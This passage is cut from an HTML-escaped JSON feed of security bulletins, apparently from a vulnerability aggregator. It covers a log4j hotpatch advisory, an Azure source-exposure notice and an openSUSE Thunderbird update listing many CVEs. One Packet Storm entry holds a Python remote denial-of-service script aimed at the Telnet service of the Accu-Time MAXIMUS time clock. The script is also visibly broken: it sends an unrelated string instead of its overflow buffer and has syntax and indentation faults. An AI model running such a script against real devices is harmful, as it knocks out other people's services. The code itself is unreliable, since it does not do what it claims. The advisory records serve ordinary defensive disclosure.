&quot;PACKETSTORM:165392&quot;, &quot;vendorId&quot;: null, &quot;hash&quot;: &quot;9129cdd509480c5e63797a611f8af850&quot;, &quot;type&quot;: &quot;packetstorm&quot;, &quot;bulletinFamily&quot;: &quot;exploit&quot;, &quot;title&quot;: &quot;Accu-Time Systems MAXIMUS 1.0 Buffer Overflow / Denial Of Service&quot;, &quot;description&quot;: &quot;&quot;, &quot;published&quot;: &quot;2021-12-23T00:00:00&quot;, &quot;modified&quot;: &quot;2021-12-23T00:00:00&quot;, &quot;cvss&quot;: {&quot;score&quot;: 0.0, &quot;vector&quot;: &quot;NONE&quot;}, &quot;cvss2&quot;: {}, &quot;cvss3&quot;: {}, &quot;href&quot;: &quot;https://packetstormsecurity.com/files/165392/Accu-Time-Systems-MAXIMUS-1.0-Buffer-Overflow-Denial-Of-Service.html&quot;, &quot;reporter&quot;: &quot;Yehia Elghaly&quot;, &quot;references&quot;: [], &quot;cvelist&quot;: [], &quot;immutableFields&quot;: [], &quot;lastseen&quot;: &quot;2021-12-23T17:16:43&quot;, &quot;history&quot;: [], &quot;viewCount&quot;: 13, &quot;enchantments&quot;: {&quot;dependencies&quot;: {&quot;references&quot;: [], &quot;modified&quot;: &quot;2021-12-23T17:16:43&quot;, &quot;rev&quot;: 2}, &quot;score&quot;: {&quot;value&quot;: 0.2, &quot;vector&quot;: &quot;NONE&quot;, &quot;modified&quot;: &quot;2021-12-23T17:16:43&quot;, &quot;rev&quot;: 2}}, &quot;objectVersion&quot;: &quot;1.6&quot;, &quot;sourceHref&quot;: &quot;https://packetstormsecurity.com/files/download/165392/accutimemaximums10-overflow.txt&quot;, &quot;sourceData&quot;: &quot;`# Exploit Title: Accu-Time Systems MAXIMUS 1.0 Telnet Remote Buffer Overflow  \n# Discovered by: Yehia Elghaly  \n# Discovered Date: 2021-12-22  \n# Vendor Homepage: https://www.accu-time.com/  \n# Software Link : https://www.accu-time.com/maximus-employee-time-clock-3/  \n# Tested Version: 1.0  \n# Vulnerability Type: Buffer Overflow (DoS) Remote  \n# Tested on OS: linux   \n  \n# Description: Accu-Time Systems MAXIMUS 1.0 Telnet Remote Buffer Overflow  \n  \n# Steps to reproduce:  \n# 1. - Accu-Time Systems MAXIMUS 1.0 Telnet listening on port 23  \n# 2. - Run the Script from remote PC/IP  \n# 3. - Telnet Crashed  \n  \n#!/usr/bin/env python3  \n  \nimport socket  \nimport sys  \nprint(\&quot;#######################################################\&quot;)  \nprint(\&quot;# Accu-Time Systems MAXIMUS Remote (BUffer Overflow) #\&quot;)  \nprint(\&quot;# -------------------------- #\&quot;)  \nprint(\&quot;# BY Yehia Elghaly #\&quot;)  \nprint(\&quot;#######################################################\&quot;)  \n  \nif (len(sys.argv)&lt;2):  \nprint (\&quot;Usage: %s &lt;Target Host&gt; \&quot;) % sys.argv[0]  \nprint (\&quot;Example: %s 192.168.113.1 \&quot;) % sys.argv[0]  \nexit(0)  \n  \nprint (\&quot;\\nSending Evil.......Buffer...\&quot;)  \ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)  \n  \ntry:  \ns.connect((sys.argv[1], 23))  \nbuffer = \&quot;A\&quot;*9400  \ns.send(\&quot; Crashed Check the connection\&quot;)  \nPrint (\&quot;Crashed\&quot;)  \nexcept:  \nprint (\&quot;Could not connect to ACCU Time Telnet!\&quot;)  \n  \n  \n`\n&quot;, &quot;_object_type&quot;: &quot;robots.models.packetstorm.PacketstormBulletin&quot;, &quot;_object_types&quot;: [&quot;robots.models.base.Bulletin&quot;, &quot;robots.models.packetstorm.PacketstormBulletin&quot;]}], &quot;amazon&quot;: [{&quot;id&quot;: &quot;ALAS2-2021-1732&quot;, &quot;vendorId&quot;: null, &quot;hash&quot;: &quot;b0bc1daf7cbb3b44bb7a568490a6f5ad&quot;, &quot;type&quot;: &quot;amazon&quot;, &quot;bulletinFamily&quot;: &quot;unix&quot;, &quot;title&quot;: &quot;Important: log4j-cve-2021-44228-hotpatch&quot;, &quot;description&quot;: &quot;**Issue Overview:**\n\nThe Apache Log4j hotpatch package starting with log4j-cve-2021-44228-hotpatch-1.1-12 will now explicitly mimic the permissions of the JVM attempting to be updated.\n\n  \n**Affected Packages:**   \n\n\nlog4j-cve-2021-44228-hotpatch\n\n  \n**Issue Correction:**   \nRun _yum update log4j-cve-2021-44228-hotpatch_ to update your system.   \n\n\n  \n\n\n**New Packages:**\n    \n    \n    noarch:  \n    \u00a0\u00a0\u00a0 log4j-cve-2021-44228-hotpatch-1.1-12.amzn2.noarch  \n      \n    src:  \n    \u00a0\u00a0\u00a0 log4j-cve-2021-44228-hotpatch-1.1-12.amzn2.src  \n      \n    \n&quot;, &quot;published&quot;: &quot;2021-12-22T21:17:00&quot;, &quot;modified&quot;: &quot;2021-12-23T21:31:00&quot;, &quot;cvss&quot;: {&quot;score&quot;: 9.3, &quot;vector&quot;: &quot;AV:N/AC:M/Au:N/C:C/I:C/A:C&quot;}, &quot;cvss2&quot;: {&quot;cvssV2&quot;: {&quot;version&quot;: &quot;2.0&quot;, &quot;vectorString&quot;: &quot;AV:N/AC:M/Au:N/C:C/I:C/A:C&quot;, &quot;accessVector&quot;: &quot;NETWORK&quot;, &quot;accessComplexity&quot;: &quot;MEDIUM&quot;, &quot;authentication&quot;: &quot;NONE&quot;, &quot;confidentialityImpact&quot;: &quot;COMPLETE&quot;, &quot;integrityImpact&quot;: &quot;COMPLETE&quot;, &quot;availabilityImpact&quot;: &quot;COMPLETE&quot;, &quot;baseScore&quot;: 9.3}, &quot;severity&quot;: &quot;HIGH&quot;, &quot;exploitabilityScore&quot;: 8.6, &quot;impactScore&quot;: 10.0, &quot;acInsufInfo&quot;: false, &quot;obtainAllPrivilege&quot;: false, &quot;obtainUserPrivilege&quot;: false, &quot;obtainOtherPrivilege&quot;: false, &quot;userInteractionRequired&quot;: false}, &quot;cvss3&quot;: {&quot;cvssV3&quot;: {&quot;version&quot;: &quot;3.1&quot;, &quot;vectorString&quot;: &quot;CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H&quot;, &quot;attackVector&quot;: &quot;NETWORK&quot;, &quot;attackComplexity&quot;: &quot;LOW&quot;, &quot;privilegesRequired&quot;: &quot;NONE&quot;, &quot;userInteraction&quot;: &quot;NONE&quot;, &quot;scope&quot;: &quot;CHANGED&quot;, &quot;confidentialityImpact&quot;: &quot;HIGH&quot;, &quot;integrityImpact&quot;: &quot;HIGH&quot;, &quot;availabilityImpact&quot;: &quot;HIGH&quot;, &quot;baseScore&quot;: 10.0, &quot;baseSeverity&quot;: &quot;CRITICAL&quot;}, &quot;exploitabilityScore&quot;: 3.9, &quot;impactScore&quot;: 6.0}, &quot;href&quot;: &quot;https://alas.aws.amazon.com/AL2/ALAS-2021-1732.html&quot;, &quot;reporter&quot;: &quot;Amazon&quot;, &quot;references&quot;: [], &quot;cvelist&quot;: [&quot;CVE-2021-44228&quot;], &quot;immutableFields&quot;: [], &quot;lastseen&quot;: &quot;2021-12-23T23:16:12&quot;, &quot;history&quot;: [], &quot;viewCount&quot;: 0, &quot;enchantments&quot;: {}, &quot;objectVersion&quot;: &quot;1.6&quot;, &quot;affectedPackage&quot;: [{&quot;OS&quot;: &quot;Amazon Linux&quot;, &quot;OSVersion&quot;: &quot;2&quot;, &quot;packageFilename&quot;: &quot;log4j-cve-2021-44228-hotpatch-1.1-12.amzn2.noarch.rpm&quot;, &quot;arch&quot;: &quot;noarch&quot;, &quot;packageVersion&quot;: &quot;1.1-12.amzn2&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageName&quot;: &quot;log4j-cve-2021-44228-hotpatch&quot;}, {&quot;OS&quot;: &quot;Amazon Linux&quot;, &quot;OSVersion&quot;: &quot;2&quot;, &quot;packageFilename&quot;: &quot;log4j-cve-2021-44228-hotpatch-1.1-12.amzn2.src.rpm&quot;, &quot;arch&quot;: &quot;src&quot;, &quot;packageVersion&quot;: &quot;1.1-12.amzn2&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageName&quot;: &quot;log4j-cve-2021-44228-hotpatch&quot;}], &quot;_object_type&quot;: &quot;robots.models.amazon.AmazonBulletin&quot;, &quot;_object_types&quot;: [&quot;robots.models.base.Bulletin&quot;, &quot;robots.models.amazon.AmazonBulletin&quot;]}], &quot;msrc&quot;: [{&quot;id&quot;: &quot;MSRC:0B23F9901A26118DA107A735CC8E6167&quot;, &quot;vendorId&quot;: null, &quot;hash&quot;: &quot;48e0c90578573ba6d2e70b85d492be3c&quot;, &quot;type&quot;: &quot;msrc&quot;, &quot;bulletinFamily&quot;: &quot;blog&quot;, &quot;title&quot;: &quot;Azure App Service Linux source repository exposure&quot;, &quot;description&quot;: &quot;MSRC was informed by Wiz.io, a cloud security vendor, under Coordinated Vulnerability Disclosure (CVD) of an issue where customers can unintentionally configure the .git folder to be created in the content root, which would put them at risk for information disclosure. This, when combined with an application configured to serve static content, makes it possible \u2026\n\n[ Azure App Service Linux source repository exposure Read More \u00bb](&lt;https://msrc-blog.microsoft.com/2021/12/22/azure-app-service-linux-source-repository-exposure/&gt;)&quot;, &quot;published&quot;: &quot;2021-12-22T18:07:24&quot;, &quot;modified&quot;: &quot;2021-12-22T18:07:24&quot;, &quot;cvss&quot;: {&quot;score&quot;: 0.0, &quot;vector&quot;: &quot;NONE&quot;}, &quot;cvss2&quot;: {}, &quot;cvss3&quot;: {}, &quot;href&quot;: &quot;https://msrc-blog.microsoft.com/2021/12/22/azure-app-service-linux-source-repository-exposure/&quot;, &quot;reporter&quot;: &quot;msrc&quot;, &quot;references&quot;: [], &quot;cvelist&quot;: [], &quot;immutableFields&quot;: [], &quot;lastseen&quot;: &quot;2021-12-22T18:10:58&quot;, &quot;history&quot;: [], &quot;viewCount&quot;: 7, &quot;enchantments&quot;: {&quot;dependencies&quot;: {&quot;references&quot;: [], &quot;modified&quot;: &quot;2021-12-22T18:10:58&quot;, &quot;rev&quot;: 2}, &quot;score&quot;: {&quot;value&quot;: 1.4, &quot;vector&quot;: &quot;NONE&quot;, &quot;modified&quot;: &quot;2021-12-22T18:10:58&quot;, &quot;rev&quot;: 2}}, &quot;objectVersion&quot;: &quot;1.6&quot;, &quot;_object_type&quot;: &quot;robots.models.rss.RssBulletin&quot;, &quot;_object_types&quot;: [&quot;robots.models.base.Bulletin&quot;, &quot;robots.models.rss.RssBulletin&quot;]}], &quot;suse&quot;: [{&quot;id&quot;: &quot;OPENSUSE-SU-2021:4150-1&quot;, &quot;vendorId&quot;: null, &quot;hash&quot;: &quot;17241a2043dd1eb8e3e845a10cee486e&quot;, &quot;type&quot;: &quot;suse&quot;, &quot;bulletinFamily&quot;: &quot;unix&quot;, &quot;title&quot;: &quot;Security update for MozillaThunderbird (important)&quot;, &quot;description&quot;: &quot;An update that fixes 33 vulnerabilities is now available.\n\nDescription:\n\n   This update for MozillaThunderbird fixes the following issues:\n\n   - Update to version 91.4 MFSA 2021-54 (bsc#1193485)\n   - CVE-2021-43536: URL leakage when navigating while executing asynchronous\n     function\n   - CVE-2021-43537: Heap buffer overflow when using structured clone\n   - CVE-2021-43538: Missing fullscreen and pointer lock notification when\n     requesting both\n   - CVE-2021-43539: GC rooting failure when calling wasm instance methods\n   - CVE-2021-43541: External protocol handler parameters were unescaped\n   - CVE-2021-43542: XMLHttpRequest error codes could have leaked the\n     existence of an external protocol handler\n   - CVE-2021-43543: Bypass of CSP sandbox directive when embedding\n   - CVE-2021-43545: Denial of Service when using the Location API in a loop\n   - CVE-2021-43546: Cursor spoofing could overlay user interface when native\n     cursor is zoomed\n   - CVE-2021-43528: JavaScript unexpectedly enabled for the composition area\n\n   - Update to version 91.3.2\n   - CVE-2021-40529: Fixed ElGamal implementation could allow plaintext\n     recovery (bsc#1190244)\n\n   - Update to version 91.3 MFSA 2021-50 (bsc#1192250)\n   - CVE-2021-38503: Fixed iframe sandbox rules did not apply to XSLT\n     stylesheets\n   - CVE-2021-38504: Fixed use-after-free in file picker dialog\n   - CVE-2021-38505: Fixed Windows 10 Cloud Clipboard may have recorded\n     sensitive user data\n   - CVE-2021-38506: Fixed Thunderbird could be coaxed into going into\n     fullscreen mode without notification or warning\n   - CVE-2021-38507: Fixed opportunistic Encryption in HTTP2 could be used to\n     bypass the Same-Origin-Policy on services hosted on other ports\n   - CVE-2021-38508: Fixed permission Prompt could be overlaid, resulting in\n     user confusion and potential spoofing\n   - CVE-2021-38509: Fixed Javascript alert box could have been spoofed onto\n     an arbitrary domain\n   - CVE-2021-38510: Fixed Download Protections were bypassed by .inetloc\n     files on Mac OS\n   - Fixed plain text reformatting regression (bsc#1182863)\n\n   - Update to version 91.2 MFSA 2021-47 (bsc#1191332)\n   - CVE-2021-29981: Live range splitting could have led to conflicting\n     assignments in the JIT\n   - CVE-2021-29982: Single bit data leak due to incorrect JIT optimization\n     and type confusion\n   - CVE-2021-29987: Users could have been tricked into accepting unwanted\n     permissions on Linux\n   - CVE-2021-32810: Data race in crossbeam-deque\n   - CVE-2021-38493: Memory safety bugs fixed in Thunderbird 78.14 and\n     Thunderbird 91.1\n   - CVE-2021-38496: Use-after-free in MessageTask\n   - CVE-2021-38497: Validation message could have been overlaid on another\n     origin\n   - CVE-2021-38498: Use-after-free of nsLanguageAtomService object\n   - CVE-2021-38500: Memory safety bugs fixed in Thunderbird 91.2\n   - CVE-2021-38501: Memory safety bugs fixed in Thunderbird 91.2\n   - CVE-2021-38502: Downgrade attack on SMTP STARTTLS connections\n\n   - Update to version 91.1.0 MFSA 2021-41 (bsc#1190269)\n   - CVE-2021-38492: Navigating to `mk:` URL scheme could load Internet\n     Explorer\n   - CVE-2021-38495: Memory safety bugs fixed in Thunderbird 91.1\n\n   - Update to version 91.0.1 MFSA 2021-37 (bsc#1189547)\n   - CVE-2021-29991: Header Splitting possible with HTTP/3 Responses\n\n\nPatch Instructions:\n\n   To install this openSUSE Security Update use the SUSE recommended installation methods\n   like YaST online_update or \&quot;zypper patch\&quot;.\n\n   Alternatively you can run the command listed for your product:\n\n   - openSUSE Leap 15.3:\n\n      zypper in -t patch openSUSE-SLE-15.3-2021-4150=1&quot;, &quot;published&quot;: &quot;2021-12-22T11:38:08&quot;, &quot;modified&quot;: &quot;2021-12-22T11:38:08&quot;, &quot;cvss&quot;: {&quot;score&quot;: 7.5, &quot;vector&quot;: &quot;AV:N/AC:L/Au:N/C:P/I:P/A:P&quot;}, &quot;cvss2&quot;: {&quot;cvssV2&quot;: {&quot;version&quot;: &quot;2.0&quot;, &quot;vectorString&quot;: &quot;AV:N/AC:L/Au:N/C:P/I:P/A:P&quot;, &quot;accessVector&quot;: &quot;NETWORK&quot;, &quot;accessComplexity&quot;: &quot;LOW&quot;, &quot;authentication&quot;: &quot;NONE&quot;, &quot;confidentialityImpact&quot;: &quot;PARTIAL&quot;, &quot;integrityImpact&quot;: &quot;PARTIAL&quot;, &quot;availabilityImpact&quot;: &quot;PARTIAL&quot;, &quot;baseScore&quot;: 7.5}, &quot;severity&quot;: &quot;HIGH&quot;, &quot;exploitabilityScore&quot;: 10.0, &quot;impactScore&quot;: 6.4, &quot;acInsufInfo&quot;: false, &quot;obtainAllPrivilege&quot;: false, &quot;obtainUserPrivilege&quot;: false, &quot;obtainOtherPrivilege&quot;: false, &quot;userInteractionRequired&quot;: false}, &quot;cvss3&quot;: {&quot;cvssV3&quot;: {&quot;version&quot;: &quot;3.1&quot;, &quot;vectorString&quot;: &quot;CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H&quot;, &quot;attackVector&quot;: &quot;NETWORK&quot;, &quot;attackComplexity&quot;: &quot;LOW&quot;, &quot;privilegesRequired&quot;: &quot;NONE&quot;, &quot;userInteraction&quot;: &quot;NONE&quot;, &quot;scope&quot;: &quot;CHANGED&quot;, &quot;confidentialityImpact&quot;: &quot;HIGH&quot;, &quot;integrityImpact&quot;: &quot;HIGH&quot;, &quot;availabilityImpact&quot;: &quot;HIGH&quot;, &quot;baseScore&quot;: 10.0, &quot;baseSeverity&quot;: &quot;CRITICAL&quot;}, &quot;exploitabilityScore&quot;: 3.9, &quot;impactScore&quot;: 6.0}, &quot;href&quot;: &quot;https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/OQOGFW6JISWI3PQR7AHD3OEX3SPELMFB/&quot;, &quot;reporter&quot;: &quot;Suse&quot;, &quot;references&quot;: [], &quot;cvelist&quot;: [&quot;CVE-2021-29981&quot;, &quot;CVE-2021-29982&quot;, &quot;CVE-2021-29987&quot;, &quot;CVE-2021-29991&quot;, &quot;CVE-2021-32810&quot;, &quot;CVE-2021-38492&quot;, &quot;CVE-2021-38493&quot;, &quot;CVE-2021-38495&quot;, &quot;CVE-2021-38496&quot;, &quot;CVE-2021-38497&quot;, &quot;CVE-2021-38498&quot;, &quot;CVE-2021-38500&quot;, &quot;CVE-2021-38501&quot;, &quot;CVE-2021-38502&quot;, &quot;CVE-2021-38503&quot;, &quot;CVE-2021-38504&quot;, &quot;CVE-2021-38505&quot;, &quot;CVE-2021-38506&quot;, &quot;CVE-2021-38507&quot;, &quot;CVE-2021-38508&quot;, &quot;CVE-2021-38509&quot;, &quot;CVE-2021-38510&quot;, &quot;CVE-2021-40529&quot;, &quot;CVE-2021-43528&quot;, &quot;CVE-2021-43536&quot;, &quot;CVE-2021-43537&quot;, &quot;CVE-2021-43538&quot;, &quot;CVE-2021-43539&quot;, &quot;CVE-2021-43541&quot;, &quot;CVE-2021-43542&quot;, &quot;CVE-2021-43543&quot;, &quot;CVE-2021-43545&quot;, &quot;CVE-2021-43546&quot;], &quot;immutableFields&quot;: [], &quot;lastseen&quot;: &quot;2021-12-24T00:27:50&quot;, &quot;history&quot;: [], &quot;viewCount&quot;: 9, &quot;enchantments&quot;: {&quot;dependencies&quot;: {&quot;references&quot;: [{&quot;type&quot;: &quot;debian&quot;, &quot;idList&quot;: [&quot;DEBIAN:DSA-5026-1:57C7D&quot;]}, {&quot;type&quot;: &quot;nessus&quot;, &quot;idList&quot;: [&quot;REDHAT-RHSA-2021-5048.NASL&quot;, &quot;REDHAT-RHSA-2021-5014.NASL&quot;, &quot;REDHAT-RHSA-2021-5045.NASL&quot;, &quot;REDHAT-RHSA-2021-4607.NASL&quot;, &quot;MOZILLA_FIREFOX_91_3_ESR.NASL&quot;, &quot;SUSE_SU-2021-3993-1.NASL&quot;, &quot;REDHAT-RHSA-2021-3838.NASL&quot;, &quot;UBUNTU_USN-5186-1.NASL&quot;, &quot;SL_20211018_THUNDERBIRD_ON_SL7_X.NASL&quot;, &quot;MOZILLA_FIREFOX_91_4_0_ESR.NASL&quot;, &quot;REDHAT-RHSA-2021-4116.NASL&quot;, &quot;REDHAT-RHSA-2021-5015.NASL&quot;, &quot;SUSE_SU-2021-3745-1.NASL&quot;, &quot;SUSE_SU-2021-4000-1.NASL&quot;, &quot;ORACLELINUX_ELSA-2021-5013.NASL&quot;, &quot;REDHAT-RHSA-2021-5047.NASL&quot;, &quot;ORACLELINUX_ELSA-2021-3838.NASL&quot;, &quot;ORACLELINUX_ELSA-2021-5045.NASL&quot;, &quot;MOZILLA_THUNDERBIRD_91_2.NASL&quot;, &quot;OPENSUSE-2021-3745.NASL&quot;, &quot;SL_20211208_FIREFOX_ON_SL7_X.NASL&quot;, &quot;ORACLELINUX_ELSA-2021-5014.NASL&quot;, &quot;CENTOS8_RHSA-2021-5013.NASL&quot;, &quot;ORACLELINUX_ELSA-2021-4123.NASL&quot;, &quot;CENTOS_RHSA-2021-3841.NASL&quot;, &quot;SUSE_SU-2021-14859-1.NASL&quot;, &quot;CENTOS8_RHSA-2021-5045.NASL&quot;, &quot;REDHAT-RHSA-2021-5055.NASL&quot;, &quot;MACOS_FIREFOX_94_0.NASL&quot;, &quot;MACOS_THUNDERBIRD_91_4_0.NASL&quot;, &quot;CENTOS_RHSA-2021-4134.NASL&quot;, &quot;SUSE_SU-2021-3995-1.NASL&quot;, &quot;MOZILLA_THUNDERBIRD_91_4_0.NASL&quot;, &quot;ORACLELINUX_ELSA-2021-3841.NASL&quot;, &quot;CENTOS8_RHSA-2021-3838.NASL&quot;, &quot;REDHAT-RHSA-2021-3840.NASL&quot;, &quot;SUSE_SU-2021-3651-1.NASL&quot;, &quot;OPENSUSE-2021-1575.NASL&quot;, &quot;MACOS_FIREFOX_91_3_ESR.NASL&quot;, &quot;MACOS_FIREFOX_91_4_0_ESR.NASL&quot;, &quot;REDHAT-RHSA-2021-5017.NASL&quot;, &quot;REDHAT-RHSA-2021-3839.NASL&quot;, &quot;ORACLELINUX_ELSA-2021-5046.NASL&quot;, &quot;MACOS_THUNDERBIRD_91_2.NASL&quot;, &quot;REDHAT-RHSA-2021-4133.NASL&quot;, &quot;DEBIAN_DSA-5026.NASL&quot;, &quot;REDHAT-RHSA-2021-5046.NASL&quot;, &quot;MOZILLA_FIREFOX_94_0.NASL&quot;, &quot;REDHAT-RHSA-2021-5016.NASL&quot;, &quot;SUSE_SU-2021-3721-1.NASL&quot;, &quot;SL_20211209_THUNDERBIRD_ON_SL7_X.NASL&quot;, &quot;REDHAT-RHSA-2021-3841.NASL&quot;, &quot;REDHAT-RHSA-2021-5013.NASL&quot;]}, {&quot;type&quot;: &quot;kaspersky&quot;, &quot;idList&quot;: [&quot;KLA12375&quot;, &quot;KLA12376&quot;]}, {&quot;type&quot;: &quot;redhat&quot;, &quot;idList&quot;: [&quot;RHSA-2021:4607&quot;, &quot;RHSA-2021:5017&quot;, &quot;RHSA-2021:4134&quot;, &quot;RHSA-2021:3841&quot;, &quot;RHSA-2021:4605&quot;, &quot;RHSA-2021:5046&quot;, &quot;RHSA-2021:3840&quot;, &quot;RHSA-2021:5047&quot;, &quot;RHSA-2021:5055&quot;, &quot;RHSA-2021:5048&quot;, &quot;RHSA-2021:5014&quot;, &quot;RHSA-2021:3838&quot;, &quot;RHSA-2021:5045&quot;, &quot;RHSA-2021:5016&quot;, &quot;RHSA-2021:5015&quot;, &quot;RHSA-2021:3839&quot;, &quot;RHSA-2021:5013&quot;]}, {&quot;type&quot;: &quot;archlinux&quot;, &quot;idList&quot;: [&quot;ASA-202112-9&quot;, &quot;ASA-202111-3&quot;, &quot;ASA-202111-2&quot;, &quot;ASA-202112-8&quot;]}, {&quot;type&quot;: &quot;almalinux&quot;, &quot;idList&quot;: [&quot;ALSA-2021:3838&quot;, &quot;ALSA-2021:4130&quot;, &quot;ALSA-2021:5013&quot;, &quot;ALSA-2021:5045&quot;, &quot;ALSA-2021:4123&quot;]}, {&quot;type&quot;: &quot;oraclelinux&quot;, &quot;idList&quot;: [&quot;ELSA-2021-5045&quot;, &quot;ELSA-2021-3841&quot;, &quot;ELSA-2021-5013&quot;, &quot;ELSA-2021-4130&quot;, &quot;ELSA-2021-5046&quot;, &quot;ELSA-2021-3838&quot;, &quot;ELSA-2021-5014&quot;]}, {&quot;type&quot;: &quot;suse&quot;, &quot;idList&quot;: [&quot;OPENSUSE-SU-2021:1575-1&quot;, &quot;OPENSUSE-SU-2021:3993-1&quot;, &quot;OPENSUSE-SU-2021:3745-1&quot;]}, {&quot;type&quot;: &quot;centos&quot;, &quot;idList&quot;: [&quot;CESA-2021:5014&quot;, &quot;CESA-2021:3841&quot;, &quot;CESA-2021:4116&quot;, &quot;CESA-2021:4134&quot;]}, {&quot;type&quot;: &quot;ubuntu&quot;, &quot;idList&quot;: [&quot;USN-5186-1&quot;, &quot;USN-5131-1&quot;, &quot;USN-5186-2&quot;]}], &quot;modified&quot;: &quot;2021-12-22T14:42:22&quot;, &quot;rev&quot;: 2}, &quot;score&quot;: {&quot;value&quot;: 3.5, &quot;vector&quot;: &quot;NONE&quot;, &quot;modified&quot;: &quot;2021-12-22T14:42:22&quot;, &quot;rev&quot;: 2}}, &quot;objectVersion&quot;: &quot;1.6&quot;, &quot;affectedPackage&quot;: [{&quot;OS&quot;: &quot;openSUSE Leap&quot;, &quot;OSVersion&quot;: &quot;15.3&quot;, &quot;arch&quot;: &quot;aarch64&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageVersion&quot;: &quot;91.4.0-8.45.2&quot;, &quot;packageFilename&quot;: &quot;MozillaThunderbird-91.4.0-8.45.2.aarch64.rpm&quot;, &quot;packageName&quot;: &quot;mozillathunderbird&quot;}, {&quot;OS&quot;: &quot;openSUSE Leap&quot;, &quot;OSVersion&quot;: &quot;15.3&quot;, &quot;arch&quot;: &quot;ppc64le&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageVersion&quot;: &quot;91.4.0-8.45.2&quot;, &quot;packageFilename&quot;: &quot;MozillaThunderbird-91.4.0-8.45.2.ppc64le.rpm&quot;, &quot;packageName&quot;: &quot;mozillathunderbird&quot;}, {&quot;OS&quot;: &quot;openSUSE Leap&quot;, &quot;OSVersion&quot;: &quot;15.3&quot;, &quot;arch&quot;: &quot;s390x&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageVersion&quot;: &quot;91.4.0-8.45.2&quot;, &quot;packageFilename&quot;: &quot;MozillaThunderbird-91.4.0-8.45.2.s390x.rpm&quot;, &quot;packageName&quot;: &quot;mozillathunderbird&quot;}, {&quot;OS&quot;: &quot;openSUSE Leap&quot;, &quot;OSVersion&quot;: &quot;15.3&quot;, &quot;arch&quot;: &quot;x86_64&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageVersion&quot;: &quot;91.4.0-8.45.2&quot;, &quot;packageFilename&quot;: &quot;MozillaThunderbird-91.4.0-8.45.2.x86_64.rpm&quot;, &quot;packageName&quot;: &quot;mozillathunderbird&quot;}, {&quot;OS&quot;: &quot;openSUSE Leap&quot;, &quot;OSVersion&quot;: &quot;15.3&quot;, &quot;arch&quot;: &quot;aarch64&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageVersion&quot;: &quot;91.4.0-8.45.2&quot;, &quot;packageFilename&quot;: &quot;MozillaThunderbird-debuginfo-91.4.0-8.45.2.aarch64.rpm&quot;, &quot;packageName&quot;: &quot;mozillathunderbird-debuginfo&quot;}, {&quot;OS&quot;: &quot;openSUSE Leap&quot;, &quot;OSVersion&quot;: &quot;15.3&quot;, &quot;arch&quot;: &quot;ppc64le&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageVersion&quot;: &quot;91.4.0-8.45.2&quot;, &quot;packageFilename&quot;: &quot;MozillaThunderbird-debuginfo-91.4.0-8.45.2.ppc64le.rpm&quot;, &quot;packageName&quot;: &quot;mozillathunderbird-debuginfo&quot;}, {&quot;OS&quot;: &quot;openSUSE Leap&quot;, &quot;OSVersion&quot;: &quot;15.3&quot;, &quot;arch&quot;: &quot;s390x&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageVersion&quot;: &quot;91.4.0-8.45.2&quot;, &quot;packageFilename&quot;: &quot;MozillaThunderbird-debuginfo-91.4.0-8.45.2.s390x.rpm&quot;, &quot;packageName&quot;: &quot;mozillathunderbird-debuginfo&quot;}, {&quot;OS&quot;: &quot;openSUSE Leap&quot;, &quot;OSVersion&quot;: &quot;15.3&quot;, &quot;arch&quot;: &quot;x86_64&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageVersion&quot;: &quot;91.4.0-8.45.2&quot;, &quot;packageFilename&quot;: &quot;MozillaThunderbird-debuginfo-91.4.0-8.45.2.x86_64.rpm&quot;, &quot;packageName&quot;: &quot;mozillathunderbird-debuginfo&quot;}, {&quot;OS&quot;: &quot;openSUSE Leap&quot;, &quot;OSVersion&quot;: &quot;15.3&quot;, &quot;arch&quot;: &quot;aarch64&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageVersion&quot;: &quot;91.4.0-8.45.2&quot;, &quot;packageFilename&quot;: &quot;MozillaThunderbird-debugsource-91.4.0-8.45.2.aarch64.rpm&quot;, &quot;packageName&quot;: &quot;mozillathunderbird-debugsource&quot;}, {&quot;OS&quot;: &quot;openSUSE Leap&quot;, &quot;OSVersion&quot;: &quot;15.3&quot;, &quot;arch&quot;: &quot;ppc64le&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageVersion&quot;: &quot;91.4.0-8.45.2&quot;, &quot;packageFilename&quot;: &quot;MozillaThunderbird-debugsource-91.4.0-8.45.2.ppc64le.rpm&quot;, &quot;packageName&quot;: &quot;mozillathunderbird-debugsource&quot;}, {&quot;OS&quot;: &quot;openSUSE Leap&quot;, &quot;OSVersion&quot;: &quot;15.3&quot;, &quot;arch&quot;: &quot;s390x&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageVersion&quot;: &quot;91.4.0-8.45.2&quot;, &quot;packageFilename&quot;: &quot;MozillaThunderbird-debugsource-91.4.0-8.45.2.s390x.rpm&quot;, &quot;packageName&quot;: &quot;mozillathunderbird-debugsource&quot;}, {&quot;OS&quot;: &quot;openSUSE Leap&quot;, &quot;OSVersion&quot;: &quot;15.3&quot;, &quot;arch&quot;: &quot;x86_64&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageVersion&quot;: &quot;91.4.0-8.45.2&quot;, &quot;packageFilename&quot;: &quot;MozillaThunderbird-debugsource-91.4.0-8.45.2.x86_64.rpm&quot;, &quot;packageName&quot;: &quot;mozillathunderbird-debugsource&quot;}, {&quot;OS&quot;: &quot;openSUSE Leap&quot;, &quot;OSVersion&quot;: &quot;15.3&quot;, &quot;arch&quot;: &quot;aarch64&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageVersion&quot;: &quot;91.4.0-8.45.2&quot;, &quot;packageFilename&quot;: &quot;MozillaThunderbird-translations-common-91.4.0-8.45.2.aarch64.rpm&quot;, &quot;packageName&quot;: &quot;mozillathunderbird-translations-common&quot;}, {&quot;OS&quot;: &quot;openSUSE Leap&quot;, 